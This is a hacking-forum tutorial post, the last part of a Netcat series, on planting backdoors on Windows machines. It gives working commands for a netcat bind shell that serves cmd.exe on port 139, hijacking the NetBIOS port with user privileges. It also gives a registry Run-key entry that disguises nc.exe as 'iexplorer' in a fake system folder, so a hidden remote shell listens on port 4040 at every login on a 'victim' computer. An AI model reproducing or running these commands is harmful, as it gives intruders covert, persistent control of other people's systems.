R00TW0RM - Private Community | Netcat Part 3 
Detailed tutorial on NetCat
This is Netcat tutorial Part 3, and Last part *))*. Here I am gonna explain back door with Netcat =).. So let's get started...

Back Door

By the way guys, you can even listen to NetBios ports that are probably running on most NT machines.
This way you can get a connection to a machine that may have port filtering enabled in the TCP/IP Security Network control panel.
Unlike Unix, NT does not seem to have any security around which ports that user programs are allowed to bind to.
This means any user can run a program that will bind to the NETBIOS ports.
You will need to bind "in front of" some services that may already be listening on those ports.

An example is the NETBIOS Session Service that is running on port 139 of NT machines that are sharing files.
You need to bind to a specific source address (one of the IP addresses of the machine) to accomplish this.
This gives Netcat priority over the NETBIOS service which is at a lower priority because it is bound to ANY IP address.
This is done with the Netcat -s option:

nc -v -L -e cmd.exe -p 139 -s [IP address]


Now you can connect to the machine on port 139 and Netcat will field the connection before NETBIOS does.
You have effectively shut off file sharing on this machine by the way.
You have done this with just user privileges to boot.

Back door on windows


So we can backdoor using NetCat, butNetCat must be running on victims computer.
I will Just write here commands to be used.. ). Other you can see in the Video.

In video in First code I wrote [5homedrive] however you gonna write it [%homedrive] ,can see and copy codes below


%homedrive%%homepath%\system32sys

%windir%\system32\cmd /c reg add HKCU\software\Microsoft\windows\currentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\systemsys\nc.exe -vv -d -L -p 4040 -e cmd.exe" /f > nul

nc.exe -vv -d -L -p 4040 -e cmd.exe

That's to all 1337 friends. :P

Thank's for reading, hope it was enough to understand Netcat.
People use NetCat only for Reverse Shell, Lulz
Anyhow See y0 next time =)

// CrosS 0_o